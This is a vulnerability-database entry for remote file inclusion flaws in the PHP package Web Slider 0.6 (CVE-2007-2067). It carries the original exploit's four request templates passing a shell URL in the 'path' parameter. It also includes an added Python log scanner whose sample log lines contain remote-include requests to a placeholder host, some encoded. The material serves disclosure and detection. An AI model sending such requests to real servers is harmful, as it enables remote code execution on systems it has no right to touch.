Marco Antonio Islas Cruz Web Slider: Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1112715    Vulnerability type: Unknown
Published: 2007-04-15    Updated: 2007-04-17
CVE ID: CVE-2007-2067    CNNVD-ID: CNNVD-200704-302
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/3745
https://www.securityfocus.com/bid/86333
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-302
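|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in Marco Antonio Islas Cruz Web Slider (WebSlider). A remote attacker can execute arbitrary PHP code via a URL in the path parameter submitted to (1) index.php, (2) modules/pdf.php, (3) plugins/highlight.php, or (4) include/modules.php.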
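For defenders reviewing web server logs, the following added example (not part of the original advisory or the Web Slider project) flags requests to the four listed scripts whose `path` parameter decodes to a URL. The log lines are constructed samples in combined log format, and the list of schemes treated as remote is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The four scripts the advisory lists; the install prefix is unknown, so match by suffix.
AFFECTED = ("/index.php", "/modules/pdf.php",
            "/plugins/highlight.php", "/include/modules.php")
# Assumption: values starting with these schemes are treated as remote includes.
REMOTE = re.compile(r"^\s*(?:(?:https?|ftps?|php|expect)://|data:)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_path_values(request_target):
    """Return decoded `path` values that look like URLs, for affected scripts only."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(AFFECTED):
        return []
    hits = []
    # parse_qs decodes once; decode again to catch double-encoded values.
    for value in parse_qs(parts.query, keep_blank_values=True).get("path", []):
        decoded = unquote(unquote(value))
        if REMOTE.search(decoded):
            hits.append(decoded)
    return hits

def scan(lines):
    """Return (line number, script path, decoded value) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = match.group(1)
        for value in suspicious_path_values(target):
            findings.append((number, urlsplit(target).path, value))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Apr/2007:10:01:02 +0000] "GET /webslider/index.php?path=http://203.0.113.5/s.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Apr/2007:10:01:05 +0000] "GET /webslider/modules/pdf.php?path=%68ttp%3A%2F%2F203.0.113.5%2Fs.txt HTTP/1.1" 200 498',
    '192.0.2.10 - - [15/Apr/2007:10:02:11 +0000] "GET /webslider/index.php?page=2 HTTP/1.1" 200 4096',
    '192.0.2.10 - - [15/Apr/2007:10:02:30 +0000] "GET /webslider/plugins/highlight.php?path=../include HTTP/1.1" 200 300',
    '192.0.2.11 - - [15/Apr/2007:10:03:00 +0000] "GET /blog/view.php?path=http://example.org/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, script, value in scan(SAMPLE_LOG):
        print(f"line {number}: {script} path={value!r}")
```

Because `index.php` is a common file name, hits on that script should be correlated with a known Web Slider install path before alerting.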
|Exploit
# Web Slider 0.6(path)Remote File Inclusion Vulnerabilities
# D.Script: http://sourceforge.net/projects/webslider/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://Www.Tryag.Com/cc
# Exploit:[Path]/index.php?path=Shell
# Exploit:[Path]/modules/pdf.php?path=Shell
# Exploit:[Path]/plugins/highlight.php?path=Shell
# Exploit:[Path]/include/modules.php?path=Shell
# Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb

# milw0rm.com [2007-04-15]
|Affected products
Webslider Webslider 0.6
|References

Source: XF
Name: webslider-path-file-include(33689)
Link: http://xforce.iss.net/xforce/xfdb/33689
Source: MILW0RM
Name: 3745
Link: http://www.milw0rm.com/exploits/3745
Source: VUPEN
Name: ADV-2007-1397
Link: http://www.frsirt.com/english/advisories/2007/1397
Source: OSVDB
Name: 37439
Link: http://osvdb.org/37439
Source: OSVDB
Name: 37438
Link: http://osvdb.org/37438
Source: OSVDB
Name: 37437
Link: http://osvdb.org/37437
Source: OSVDB
Name: 37436
Link: http://osvdb.org/37436